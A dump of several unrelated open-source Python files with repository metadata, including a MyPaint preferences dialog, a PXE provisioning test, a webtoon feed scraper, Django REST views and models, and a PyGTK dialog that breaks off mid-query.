| 1,736
|
# This file is part of MyPaint.
# Copyright (C) 2008-2009 by Martin Renold <martinxyz@gmx.ch>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"preferences dialog"
from bisect import bisect_left
from gettext import gettext as _
import gtk, os
gdk = gtk.gdk
from functionwindow import CurveWidget
from lib import mypaintlib
import windowing, filehandling
device_modes = [
('disabled', _("Disabled (no pressure sensitivity)")),
('screen', _("Screen (normal)")),
('window', _("Window (not recommended)")), ]
RESPONSE_REVERT = 1
# Rebindable mouse buttons
mouse_button_actions = [
# These can be names of actions within ActionGroups defined elsewhere,
# or names of actions the handler interprets itself.
# NOTE: The translatable strings for actions are duplicated from
# their action definition. Please keep in sync (or refactor to get the string from there)
# (action_or_whatever, label)
('no_action', _("No action")), #[0] is the default for the comboboxes
('popup_menu', _("Menu")),
('ToggleSubwindows', _("Toggle Subwindows")),
('ColorPickerPopup', _("Pick Color")),
('PickContext', _('Pick Context (layer, brush and color)')),
('PickLayer', _('Select Layer at Cursor')),
('pan_canvas', _("Pan")),
('zoom_canvas', _("Zoom")),
('rotate_canvas', _("Rotate")),
('straight_line', _("Straight Line")),
('straight_line_sequence', _("Sequence of Straight Lines")),
('ColorChangerPopup', _("Color Changer")),
('ColorRingPopup', _("Color Ring")),
('ColorHistoryPopup', _("Color History")),
]
mouse_button_prefs = [
# Used for creating the menus,
# (pref_name, label)
("input.button1_shift_action", _("Button 1 + Shift")),
("input.button1_ctrl_action", _("Button 1 + Ctrl (or Alt)")),
("input.button2_action", _("Button 2")),
("input.button2_shift_action", _("Button 2 + Shift")),
("input.button2_ctrl_action", _("Button 2 + Ctrl (or Alt)")),
("input.button3_action", _("Button 3")),
("input.button3_shift_action", _("Button 3 + Shift")),
("input.button3_ctrl_action", _("Button 3 + Ctrl (or Alt)")),
]
class Window(windowing.Dialog):
'''Window for manipulating preferences.'''
def __init__(self, app):
flags = gtk.DIALOG_DESTROY_WITH_PARENT
buttons = (gtk.STOCK_REVERT_TO_SAVED, RESPONSE_REVERT,
gtk.STOCK_OK, gtk.RESPONSE_ACCEPT)
windowing.Dialog.__init__(self, app=app, title=_('Preferences'),
parent=app.drawWindow, flags=flags,
buttons=buttons)
self.connect('response', self.on_response)
self.in_update_ui = False
# Set up widgets
nb = gtk.Notebook()
nb.set_border_width(12)
self.vbox.pack_start(nb, expand=True, padding=0)
### Input tab
table = gtk.Table(5, 3)
table.set_border_width(12)
table.set_col_spacing(0, 12)
table.set_col_spacing(1, 12)
table.set_row_spacings(6)
current_row = 0
# TRANSLATORS: Tab label
nb.append_page(table, gtk.Label(_('Pen Input')))
xopt = gtk.FILL | gtk.EXPAND
yopt = gtk.FILL
l = gtk.Label()
l.set_alignment(0.0, 0.5)
l.set_markup(_('<b>Input Device</b>'))
table.attach(l, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label()
l.set_alignment(0.0, 0.5)
l.set_line_wrap(True)
l.set_markup(_('Scale input pressure to brush pressure. This is applied to all input devices. The mouse button has an input pressure of 0.5 when pressed.'))
table.attach(l, 1, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
t = gtk.Table(4, 4)
self.cv = CurveWidget(self.pressure_curve_changed_cb, magnetic=False)
t.attach(self.cv, 0, 3, 0, 3, gtk.EXPAND | gtk.FILL, gtk.EXPAND | gtk.FILL, 5, 0)
l1 = gtk.Label('1.0')
        if hasattr(l1, 'set_angle'):
# TRANSLATORS: Graph y-axis label
l2 = gtk.Label(_('Brush Pressure'))
l2.set_angle(90)
else:
l2 = gtk.Label('')
l3 = gtk.Label('0.0')
t.attach(l1, 3, 4, 0, 1, 0, 0, 5, 0)
t.attach(l2, 3, 4, 1, 2, 0, gtk.EXPAND, 5, 0)
t.attach(l3, 3, 4, 2, 3, 0, 0, 5, 0)
l4 = gtk.Label('0.0')
# TRANSLATORS: Graph x-axis label
l5 = gtk.Label(_('Input Pressure'))
l5.set_justify(gtk.JUSTIFY_CENTER)
l6 = gtk.Label('1.0')
t.attach(l4, 0, 1, 3, 4, 0, 0, 5, 0)
t.attach(l5, 1, 2, 3, 4, gtk.EXPAND, 0, 5, 0)
t.attach(l6, 2, 3, 3, 4, 0, 0, 5, 0)
table.attach(t, 1, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label(_('Mode: '))
l.set_alignment(0.0, 0.5)
table.attach(l, 1, 2, current_row, current_row + 1, xopt, yopt)
combo = self.input_devices_combo = gtk.combo_box_new_text()
for m, s in device_modes:
combo.append_text(s)
combo.connect('changed', self.input_devices_combo_changed_cb)
table.attach(combo, 2, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
### Buttons tab
table = gtk.Table(5, 3)
table.set_border_width(12)
table.set_col_spacing(0, 12)
table.set_col_spacing(1, 12)
table.set_row_spacings(6)
current_row = 0
nb.append_page(table, gtk.Label(_('Buttons')))
xopt = gtk.FILL | gtk.EXPAND
yopt = gtk.FILL
l = gtk.Label()
l.set_alignment(0.0, 0.5)
l.set_markup(_('<b>Pen and mouse button mappings</b>'))
table.attach(l, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
# Mouse button actions
self.mouse_action_comboboxes = {}
for pref_name, label_str in mouse_button_prefs:
l = gtk.Label(label_str)
l.set_alignment(0.0, 0.5)
table.attach(l, 1, 2, current_row, current_row + 1, xopt, yopt)
action_name = self.app.preferences.get(pref_name, None)
c = gtk.combo_box_new_text()
self.mouse_action_comboboxes[pref_name] = c
for a, s in mouse_button_actions:
c.append_text(s)
c.connect("changed", self.mouse_button_action_changed, pref_name)
table.attach(c, 2, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
### Saving tab
table = gtk.Table(5, 3)
table.set_border_width(12)
table.set_col_spacing(0, 12)
table.set_col_spacing(1, 12)
table.set_row_spacings(6)
current_row = 0
nb.append_page(table, gtk.Label(_('Saving')))
xopt = gtk.FILL | gtk.EXPAND
yopt = gtk.FILL
l = gtk.Label()
l.set_alignment(0.0, 0.5)
l.set_markup(_('<b>Saving</b>'))
table.attach(l, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label(_('Default file format:'))
l.set_alignment(0.0, 0.5)
combo = self.defaultsaveformat_combo = gtk.combo_box_new_text()
self.defaultsaveformat_values = [filehandling.SAVE_FORMAT_ORA,
filehandling.SAVE_FORMAT_PNGSOLID, filehandling.SAVE_FORMAT_JPEG]
for saveformat in self.defaultsaveformat_values:
format_desc = self.app.filehandler.saveformats[saveformat][0]
combo.append_text(format_desc)
combo.connect('changed', self.defaultsaveformat_combo_changed_cb)
table.attach(l, 1, 2, current_row, current_row + 1, xopt, yopt)
table.attach(combo, 2, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label()
l.set_alignment(0.0, 0.5)
l.set_markup(_('<b>Save Next Scrap</b>'))
table.attach(l, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label(_('Path and filename prefix:'))
l.set_alignment(0.0, 0.5)
self.prefix_entry = gtk.Entry()
self.prefix_entry.connect('changed', self.prefix_entry_changed_cb)
table.attach(l, 1, 2, current_row, current_row + 1, xopt, yopt)
table.attach(self.prefix_entry, 2, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
### View tab
table = gtk.Table(2, 4)
table.set_border_width(12)
table.set_col_spacing(0, 12)
table.set_col_spacing(1, 12)
table.set_row_spacings(6)
current_row = 0
nb.append_page(table, gtk.Label(_('View')))
xopt = gtk.FILL | gtk.EXPAND
yopt = gtk.FILL
l = gtk.Label()
l.set_alignment(0.0, 0.5)
l.set_markup(_('<b>Default View</b>'))
table.attach(l, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label(_('Default zoom:'))
l.set_alignment(0.0, 0.5)
combo = self.defaultzoom_combo = gtk.combo_box_new_text()
# Different from doc.zoomlevel_values because we only want a subset
# - keep sorted for bisect
self.defaultzoom_values = [0.25, 0.50, 1.0, 2.0]
for val in self.defaultzoom_values:
combo.append_text('%d%%' % (val*100))
combo.connect('changed', self.defaultzoom_combo_changed_cb)
table.attach(l, 1, 2, current_row, current_row + 1, xopt, yopt)
table.attach(combo, 2, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
b = self.highqualityzoom_checkbox = gtk.CheckButton(_('High quality zoom (may result in slow scrolling)'))
b.connect('toggled', self.highqualityzoom_checkbox_changed_cb)
table.attach(b, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
def on_response(self, dialog, response, *args):
if response == gtk.RESPONSE_ACCEPT:
self.app.save_settings()
self.hide()
elif response == RESPONSE_REVERT:
self.app.load_settings()
self.app.apply_settings()
def update_ui(self):
"""Update the preferences window to reflect the current settings."""
if self.in_update_ui:
return
self.in_update_ui = True
p = self.app.preferences
self.cv.points = p['input.global_pressure_mapping']
self.prefix_entry.set_text(p['saving.scrap_prefix'])
# Device mode
mode_config = p.get("input.device_mode", None)
mode_idx = i = 0
for mode_name, junk in device_modes:
if mode_config == mode_name:
mode_idx = i
break
i += 1
self.input_devices_combo.set_active(mode_idx)
zoom = p['view.default_zoom']
zoomlevel = min(bisect_left(self.defaultzoom_values, zoom),
len(self.defaultzoom_values) - 1)
self.defaultzoom_combo.set_active(zoomlevel)
self.highqualityzoom_checkbox.set_active(p['view.high_quality_zoom'])
        saveformat_config = p['saving.default_format']
        saveformat_idx = self.app.filehandler.config2saveformat[saveformat_config]
        try:
            idx = self.defaultsaveformat_values.index(saveformat_idx)
        except ValueError:
            idx = 0  # fall back to the first offered format for unknown configs
        self.defaultsaveformat_combo.set_active(idx)
# Mouse button
for pref_name, junk in mouse_button_prefs:
action_config = p.get(pref_name, None)
action_idx = i = 0
for action_name, junk in mouse_button_actions:
if action_config == action_name:
action_idx = i
break
i += 1
combobox = self.mouse_action_comboboxes[pref_name]
combobox.set_active(action_idx)
self.cv.queue_draw()
self.in_update_ui = False
# Callbacks for widgets that manipulate settings
def input_devices_combo_changed_cb(self, widget):
i = widget.get_property("active")
mode = device_modes[i][0]
self.app.preferences['input.device_mode'] = mode
self.app.apply_settings()
def mouse_button_action_changed(self, widget, pref_name):
i = widget.get_property("active")
action = mouse_button_actions[i][0]
self.app.preferences[pref_name] = action
self.app.apply_settings()
def pressure_curve_changed_cb(self, widget):
self.app.preferences['input.global_pressure_mapping'] = self.cv.points[:]
self.app.apply_settings()
def prefix_entry_changed_cb(self, widget):
self.app.preferences['saving.scrap_prefix'] = widget.get_text()
def defaultzoom_combo_changed_cb(self, widget):
zoomlevel = self.defaultzoom_combo.get_active()
zoom = self.defaultzoom_values[zoomlevel]
self.app.preferences['view.default_zoom'] = zoom
def highqualityzoom_checkbox_changed_cb(self, widget):
self.app.preferences['view.high_quality_zoom'] = bool(widget.get_active())
self.app.doc.tdw.queue_draw()
    def defaultsaveformat_combo_changed_cb(self, widget):
        idx = self.defaultsaveformat_combo.get_active()
        saveformat = self.defaultsaveformat_values[idx]
        # Reverse lookup; leave the preference unchanged if nothing matches
        for key, val in self.app.filehandler.config2saveformat.iteritems():
            if val == saveformat:
                self.app.preferences['saving.default_format'] = key
                break
|
benosteen/mypaint
|
gui/preferenceswindow.py
|
Python
|
gpl-2.0
| 13,712
|
# -*- coding: utf-8 -*-
import fauxfactory
import pytest
from cfme.utils.conf import cfme_data
from cfme.common.provider import cleanup_vm
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.provider.scvmm import SCVMMProvider
from cfme.infrastructure.pxe import get_pxe_server_from_config, get_template_from_config
from cfme.provisioning import do_vm_provisioning
from cfme.utils import testgen
pytestmark = [
pytest.mark.meta(server_roles="+automate +notifier"),
pytest.mark.usefixtures('uses_infra_providers'),
pytest.mark.tier(2)
]
def pytest_generate_tests(metafunc):
# Filter out providers without provisioning data or hosts defined
argnames, argvalues, idlist = testgen.providers_by_class(
metafunc, [InfraProvider],
required_fields=[
['provisioning', 'pxe_server'],
['provisioning', 'pxe_image'],
['provisioning', 'pxe_image_type'],
['provisioning', 'pxe_kickstart'],
['provisioning', 'pxe_template'],
['provisioning', 'datastore'],
['provisioning', 'host'],
['provisioning', 'pxe_root_password'],
['provisioning', 'vlan']
]
)
pargnames, pargvalues, pidlist = testgen.pxe_servers(metafunc)
argnames = argnames + ['pxe_server', 'pxe_cust_template']
pxe_server_names = [pval[0] for pval in pargvalues]
new_idlist = []
new_argvalues = []
for i, argvalue_tuple in enumerate(argvalues):
args = dict(zip(argnames, argvalue_tuple))
provider = args['provider']
if provider.one_of(SCVMMProvider):
continue
provisioning_data = provider.data['provisioning']
pxe_server_name = provisioning_data['pxe_server']
if pxe_server_name not in pxe_server_names:
continue
pxe_cust_template = provisioning_data['pxe_kickstart']
if pxe_cust_template not in cfme_data.get('customization_templates', {}).keys():
continue
argvalues[i].append(get_pxe_server_from_config(pxe_server_name))
argvalues[i].append(get_template_from_config(pxe_cust_template))
new_idlist.append(idlist[i])
new_argvalues.append(argvalues[i])
testgen.parametrize(metafunc, argnames, new_argvalues, ids=new_idlist, scope="module")
@pytest.fixture(scope="function")
def setup_pxe_servers_vm_prov(pxe_server, pxe_cust_template, provisioning):
if not pxe_server.exists():
pxe_server.create()
pxe_server.set_pxe_image_type(provisioning['pxe_image'], provisioning['pxe_image_type'])
if not pxe_cust_template.exists():
pxe_cust_template.create()
@pytest.fixture(scope="function")
def vm_name():
vm_name = 'test_pxe_prov_{}'.format(fauxfactory.gen_alphanumeric())
return vm_name
def test_pxe_provision_from_template(appliance, provider, vm_name, smtp_test, setup_provider,
request, setup_pxe_servers_vm_prov):
"""Tests provisioning via PXE
Metadata:
test_flag: pxe, provision
suite: infra_provisioning
"""
# generate_tests makes sure these have values
(
pxe_template, host, datastore,
pxe_server, pxe_image, pxe_kickstart,
pxe_root_password, pxe_image_type, pxe_vlan
) = map(
provider.data['provisioning'].get,
(
'pxe_template', 'host', 'datastore',
'pxe_server', 'pxe_image', 'pxe_kickstart',
'pxe_root_password', 'pxe_image_type', 'vlan'
)
)
request.addfinalizer(lambda: cleanup_vm(vm_name, provider))
provisioning_data = {
'catalog': {
'vm_name': vm_name,
'provision_type': 'PXE',
'pxe_server': pxe_server,
'pxe_image': {'name': pxe_image}},
'environment': {
'host_name': {'name': host},
'datastore_name': {'name': datastore}},
'customize': {
'custom_template': {'name': pxe_kickstart},
'root_password': pxe_root_password},
'network': {
'vlan': pxe_vlan}}
do_vm_provisioning(appliance, pxe_template, provider, vm_name, provisioning_data, request,
smtp_test, num_sec=2100)
|
okolisny/integration_tests
|
cfme/tests/infrastructure/test_pxe_provisioning.py
|
Python
|
gpl-2.0
| 4,265
|
#!/usr/bin/env python
import sys
import os
import re
import json
import getopt
from typing import List
import logging
import logging.config
from pathlib import Path
from feed_maker_util import IO, URL, header_str
from feed_maker import FeedMaker
logging.config.fileConfig(os.environ["FEED_MAKER_HOME_DIR"] + "/bin/logging.conf")
LOGGER = logging.getLogger()
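# Usage sketch (the webtoon JSON listing is read from stdin; option values
# below are examples, not defaults from this file):
#   ... | capture_item_link_title.py -n 100 -f /path/to/feed/dir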
def check_excluded_keyword(line_list: List[str]) -> bool:
excluded_keyword_list = ["남장여자", "에로틱", "로맨스", "육아"]
for excluded_keyword in excluded_keyword_list:
for line in line_list:
if excluded_keyword in line:
return True
return False
def compose_description(item, link):
description = "<div>\n"
description += " <div>%s</div>\n" % item["title"]
description += " <div>%s</div>\n" % ", ".join(item["seoKeywords"])
description += " <div>%s</div>\n" % item["catchphraseTwoLines"]
description += " <div><a href='%s'>%s</a></div>\n" % (link, link)
description += " <div class='position: relative;'>\n"
description += " <div style='position: absolute; top: 150px; max-height: 600px; overflow: hidden;'><img src='%s'></div>\n" % (item["backgroundImage"] + ".webp")
description += " <div style='position: absolute; top: 150px;'><img src='%s'></div>\n" % (item["featuredCharacterImageA"] + ".png")
description += " </div>\n"
description += "</div>\n"
return description
def main():
link_prefix = "http://webtoon.kakao.com/content"
link = ""
title = ""
num_of_recent_feeds = 1000
feed_dir_path = Path(os.environ["FEED_MAKER_WORK_DIR"])
optlist, _ = getopt.getopt(sys.argv[1:], "n:f:")
for o, a in optlist:
if o == '-n':
num_of_recent_feeds = int(a)
elif o == "-f":
feed_dir_path = Path(a)
content = IO.read_stdin()
content = re.sub(r'(^(<\S[^>]*>)+|(<\S[^>]*>)+$)', '', content)
result_list = []
json_data = json.loads(content)
if "data" in json_data:
if "sections" in json_data["data"]:
for section in json_data["data"]["sections"]:
# section == weekday
if "cardGroups" in section:
for card_group in section["cardGroups"]:
if "cards" in card_group:
for card in card_group["cards"]:
if "content" in card:
item = card["content"]
if not item["adult"] and not check_excluded_keyword(item["seoKeywords"]):
link = "%s/%s/%s" % (link_prefix, item["seoId"], item["id"])
title = item["title"]
result_list.append((link, title))
# 특수한 처리 - extraction 단계를 여기서 수행
description = compose_description(item, link)
html_file_name = URL.get_short_md5_name(URL.get_url_path(link)) + ".html"
file_path = feed_dir_path / "html" / html_file_name
if os.path.isfile(file_path):
continue
with open(file_path, 'w', encoding="utf-8") as fp:
fp.write(header_str)
fp.write(description)
fp.write(FeedMaker.get_image_tag_str("https://terzeron.com", "kakaowebtoon.xml", link))
for (link, title) in result_list[:num_of_recent_feeds]:
print("%s\t%s" % (link, title))
if __name__ == "__main__":
sys.exit(main())
|
terzeron/FeedMakerApplications
|
kakao/kakaowebtoon/capture_item_link_title.py
|
Python
|
gpl-2.0
| 3,876
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import with_statement
import os
__author__ = 'Henrik Lindgren'
# See LICENSE file for license (GPL2)
from save_file_parser import StrandedSaveTool
import Tkinter as tk
import tkFileDialog
import logging as log
log.basicConfig(format='%(levelname)s %(asctime)s %(funcName)s(): %(message)s',
level=log.DEBUG)
class Application(tk.Frame):
"""
Skeleton taken from
http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/minimal-app.html
"""
SIZE_OF_ISLAND_DOT = 5
SIZE_OF_PLAYER_DOT = 5
COLOR_OF_ISLAND = 'blue'
COLOR_OF_SEA = 'white'
COLOR_OF_PLAYER = 'red'
def __init__(self, size=1024, title='World Viewer'):
tk.Frame.__init__(self)
width = size
height = size
self.master.minsize(width=width, height=height)
self.master.maxsize(width=width, height=height)
self.normalize_origo = size / 2
self.master.resizable(width=tk.FALSE, height=tk.FALSE)
self.master.title(title)
self.grid()
self.reload_button = tk.Button(self, text='Reload',
                                       command=self.reload, state='disabled')
self.reload_button.grid()
self.load_button = tk.Button(self, text='Load savefile',
command=self.load_file)
self.load_button.grid()
self.canvas = tk.Canvas(self, bg=Application.COLOR_OF_SEA, width=0, height=0)
self.canvas.grid()
self.filepath = None
self.player = None
self.world = None
# if you adjust scale_mod from .2 to .1,
# you need to raise adjust_mod from 2 to 4 and so on
self.scale_mod = .1
self.adjust_mod = 4
def _load_from_file(self, _file):
"""
Loads a world from a file to wherever we're drawing it.
:param _file:
"""
file_contents = ''.join(_file.readlines())
tool = StrandedSaveTool(file_contents)
self.player = tool.get_player()
self.world = tool.get_world_and_islands()
self.draw_world_and_player()
def _normalize_and_scale_coordinate(self, value, scale):
return (value + self.normalize_origo) / scale
def get_scale_x(self):
return (self.world.max_distance_x /
self.winfo_width()) * self.scale_mod
def get_scale_z(self):
return (self.world.max_distance_z /
self.winfo_height()) * self.scale_mod
def draw_world_and_player(self):
"""
Draws a map on the canvas.
"""
self.canvas.delete(tk.ALL)
        self.canvas.config(width=self.master.winfo_width(),
                           height=self.master.winfo_height())
log.debug('canvas w:%s, h:%s',
self.master.winfo_width(), self.master.winfo_height())
scale_x = self.get_scale_x()
scale_z = self.get_scale_z()
x_adjust = self.master.winfo_width() * self.scale_mod * self.adjust_mod
z_adjust = self.master.winfo_height() * self.scale_mod * self.adjust_mod
if self.player and self.world:
for island in self.world.islands:
island_x = self._normalize_and_scale_coordinate(
island.position.x, scale_x) + x_adjust
island_z = self._normalize_and_scale_coordinate(
island.position.z, scale_z) + z_adjust
self.canvas.create_rectangle(
island_x, island_z,
island_x + Application.SIZE_OF_ISLAND_DOT,
island_z + Application.SIZE_OF_ISLAND_DOT,
fill=Application.COLOR_OF_ISLAND)
player_x = self._normalize_and_scale_coordinate(
self.player.position.x, scale_x) + x_adjust
player_z = self._normalize_and_scale_coordinate(
self.player.position.z, scale_z) + z_adjust
self.canvas.create_rectangle(
player_x, player_z,
player_x + Application.SIZE_OF_PLAYER_DOT,
player_z + Application.SIZE_OF_PLAYER_DOT,
fill=Application.COLOR_OF_PLAYER)
else:
log.warn("player? %s, world? %s",
self.player is not None, self.world is not None)
def reload(self):
"""
Updates the map from a file with the same path as the last file loaded.
"""
log.debug('Clicked reload!')
with open(self.filepath, 'r') as _file:
self._load_from_file(_file)
def load_file(self):
"""
Open a file manager to point at a Stranded Deep save file
See http://tkinter.unpythonic.net/wiki/tkFileDialog for docs
"""
log.debug('Clicked load!')
self.reload_button.configure(state='normal')
with tkFileDialog.askopenfile(mode='r') as _file:
self.filepath = os.path.abspath(_file.name)
self._load_from_file(_file)
if __name__ == '__main__':
app = Application()
app.mainloop()
|
henriklindgren/strandedsavetool
|
world_viewer.py
|
Python
|
gpl-2.0
| 5,069
|
#!/bin/python
# -*- coding: utf-8 -*-
# Author: Pavel Studenik
# Email: pstudeni@redhat.com
# Date: 24.9.2013
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework import viewsets
from apps.core.models import JobTemplate, Recipe, \
Task, Author, Arch, Distro, System, Test
from apps.waiver.models import Comment
from models import Performance
from filters import TaskFilter
from serializers import JobTemplateSerializer, RecipeSerializer, \
TaskSerializer, AuthorSerializer, ArchSerializer, \
DistroSerializer, SystemSerializer, \
CommentSerializer, TestSerializer
class RecipeViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Recipe.objects.all().select_related('job', 'arch', 'distro')
serializer_class = RecipeSerializer
ordering_fields = '__all__'
ordering = ('-uid',)
filter_fields = ('uid', )
http_method_names = ['get', 'head']
class AuthorViewSet(viewsets.ModelViewSet):
"""
API endpoint for Author.
"""
queryset = Author.objects.all()
serializer_class = AuthorSerializer
ordering_fields = '__all__'
ordering = ('-email',)
http_method_names = ['get', 'head']
class TaskViewSet(viewsets.ModelViewSet):
"""
API endpoint for Tasks. It is possible to use attribute 'results' for
filtering more then one result.
&results=3,4,5
"""
queryset = Task.objects.all().select_related('test')
serializer_class = TaskSerializer
filter_class = TaskFilter
ordering_fields = '__all__'
ordering = ('-uid',)
http_method_names = ['get', 'head']
class JobTemplateViewSet(viewsets.ModelViewSet):
queryset = JobTemplate.objects.all()
serializer_class = JobTemplateSerializer
ordering_fields = '__all__'
ordering = ('-id',)
filter_fields = ('uid', )
http_method_names = ['get', 'head']
class ArchViewSet(viewsets.ModelViewSet):
"""
API endpoint for Arch.
"""
queryset = Arch.objects.all()
serializer_class = ArchSerializer
ordering_fields = '__all__'
ordering = ('-id',)
http_method_names = ['get', 'head']
class DistroViewSet(viewsets.ModelViewSet):
"""
API endpoint for Distro.
"""
queryset = Distro.objects.all()
serializer_class = DistroSerializer
ordering_fields = '__all__'
ordering = ('-id',)
http_method_names = ['get', 'head']
class SystemViewSet(viewsets.ModelViewSet):
"""
API endpoint for System.
"""
queryset = System.objects.all()
serializer_class = SystemSerializer
ordering_fields = '__all__'
ordering = ('-id',)
http_method_names = ['get', 'head']
class CommentViewSet(viewsets.ModelViewSet):
"""
API endpoint for Comment.
"""
queryset = Comment.objects.all()
serializer_class = CommentSerializer
ordering_fields = '__all__'
ordering = ('-id',)
http_method_names = ['get', 'head']
class TestViewSet(viewsets.ModelViewSet):
"""
API endpoint for Test.
"""
queryset = Test.objects.all()
serializer_class = TestSerializer
ordering_fields = '__all__'
ordering = ('-id',)
http_method_names = ['get', 'head']
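# Example POST against the endpoint below (the URL path is illustrative; the
# real route depends on this app's urlconf):
#   curl -X POST http://localhost:8000/api/performance/ \
#        -d "label=io" -d "name=disk-write" -d "duration=1.25" -d "exitcode=0"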
@csrf_exempt
def performance(request):
perf = Performance(
label=request.POST.get("label"),
name=request.POST.get("name"),
description=request.POST.get("description"),
exitcode=request.POST.get("exitcode", -1),
duration=request.POST.get("duration")
)
perf.save()
data = "ok"
    return HttpResponse(data, content_type="application/json")
|
BlackSmith/GreenTea
|
apps/api/views.py
|
Python
|
gpl-2.0
| 3,641
|
# -*- coding:utf-8 -*-
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, PermissionsMixin
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
class UserManager(BaseUserManager):
def create_user(self, user_id, name, password=None, **extra_fields):
"""
Creates and saves a User with the given email and password.
"""
now = timezone.now()
user = self.model(user_id = user_id, name = name,
is_staff=False, is_active=True, is_superuser=False,
last_login=now, date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, user_id, name, password, **extra_fields):
u = self.create_user(user_id, name, password, **extra_fields)
u.is_staff = True
u.is_active = True
u.is_superuser = True
u.save(using=self._db)
return u
class BookShareAbstractUser(AbstractBaseUser, PermissionsMixin):
user_id = models.CharField(_(u'학번'),
max_length=10,
help_text=_(u'학번'),
unique=True,
db_index=True)
name = models.CharField(_(u'이름'),
max_length=15,
help_text=_(u'이름'))
email = models.EmailField(_('Email'),
max_length=255,
unique=True)
is_staff = models.BooleanField(_('staff status'),
default=False,
help_text=_('Designates whether the user can log into this admin '
'site.'))
is_active = models.BooleanField(_('active'), default=True,
help_text=_('Designates whether this user should be treated as'
'active. Unselect this instead of deleting accounts.'))
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
phone_number = models.CharField(_(u'연락처'),
max_length=20)
objects = UserManager()
REQUIRED_FIELDS = ['name']
USERNAME_FIELD = 'user_id'
class Meta:
verbose_name = _(u'사용자')
verbose_name_plural = _(u'사용자')
abstract = True
def get_short_name(self):
return self.name
def get_full_name(self):
return self.name
def __unicode__(self):
return u"{} ({})".format(self.name, self.phone_number)
class User(BookShareAbstractUser):
class Meta:
verbose_name = _(u'서비스 유저')
verbose_name_plural = _(u'서비스 유저들')
swappable = 'AUTH_USER_MODEL'
points = models.IntegerField(default=0)
def ensure_points(self, points):
assert self.points >= points, "포인트가 부족합니다"
def get_points(self, points):
assert points > 0, "포인트는 0 이하로 떨어질 수 없습니다"
self.points += points
def lose_points(self, points):
assert points > 0, "포인트가 0 이하로 떨어질 수 없습니다"
self.ensure_points(points)
self.points -= points
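# Usage sketch (assumes a saved User instance `user`; amounts are examples):
#   user.get_points(10)   # credit 10 points
#   user.lose_points(3)   # debit 3; the assertions guard against overdraft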
|
SungJinYoo/BookShare
|
bookshare/apps/users/models.py
|
Python
|
gpl-2.0
| 3,448
|
#! /usr/bin/env python
import sys
import dendropy
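# Usage: calc-subtree-leaf-set-sizes.py <tree-file> <schema>
# where <schema> is a dendropy format name such as "newick" or "nexus".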
def count_subtree_leaf_set_sizes(tree):
internal_nodes = tree.internal_nodes()
subtree_leaf_set_sizes = {}
for nd in internal_nodes:
leaf_count = 0
for leaf in nd.leaf_iter():
leaf_count += 1
if nd.taxon is not None:
label = nd.taxon.label
else:
label = nd.label
subtree_leaf_set_sizes[label] = leaf_count
return subtree_leaf_set_sizes
trees = dendropy.TreeList.get_from_path(sys.argv[1], sys.argv[2])
for tidx, tree in enumerate(trees):
subtree_leaf_set_sizes = count_subtree_leaf_set_sizes(tree)
keys = sorted(subtree_leaf_set_sizes.keys())
for key in keys:
sys.stdout.write("{}\t{}\t{}\n".format(tidx, key, subtree_leaf_set_sizes[key]))
|
jeetsukumaran/pstrudel
|
test/scripts/calc-subtree-leaf-set-sizes.py
|
Python
|
gpl-2.0
| 805
|
#!/usr/bin/env python
############################################################################
# Copyright (C) 2005 by #
# #
# Milton Inostroza Aguilera #
# minoztro@gmail.com #
# #
# This class is free software; you can redistribute it and#or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
# This class is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program; if not, write to the #
# Free Software Foundation, Inc., #
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. #
############################################################################
from GladeConnect import GladeConnect
import pygtk
pygtk.require('2.0')
import gtk
import sys
from dialogo_error import DialogoError
from types import StringType
class Salud(GladeConnect):
"Crea, Modifica, Actualiza sistema de salud FONOSA o ISAPRES"
def __init__(self,cursor):
GladeConnect.__init__(self, "glade/salud.glade")
self.cursor=cursor
self.ventana_activa = None
self.padre = None
        # make the entry boxes non-editable
self.entryNombre.set_sensitive(False)
self.entryRazonSocial.set_sensitive(False)
        # disable the buttons that do not apply yet
self.toolbuttonNuevo.set_sensitive(True)
self.toolbuttonAnadir.set_sensitive(False)
self.toolbuttonActualizar.set_sensitive(False)
self.toolbuttonQuitar.set_sensitive(False)
        # put focus on the first entry
self.entryNombre.grab_focus()
        # tree view setup
self.define_vista()
self.crea_modelo()
def define_vista(self):
lbl = unicode('Nombre')
column = gtk.TreeViewColumn(lbl.encode('utf-8'), gtk.CellRendererText(), text=0)
self.treeviewSalud.append_column(column)
lbl = unicode('Razon Social')
column = gtk.TreeViewColumn(lbl.encode('utf-8'), gtk.CellRendererText(), text=1)
self.treeviewSalud.append_column(column)
def crea_modelo(self):
self.modelo = gtk.ListStore(str, str)
self.treeviewSalud.set_model(self.modelo)
def lista_datos(self):
self.modelo.clear()
sql ="""
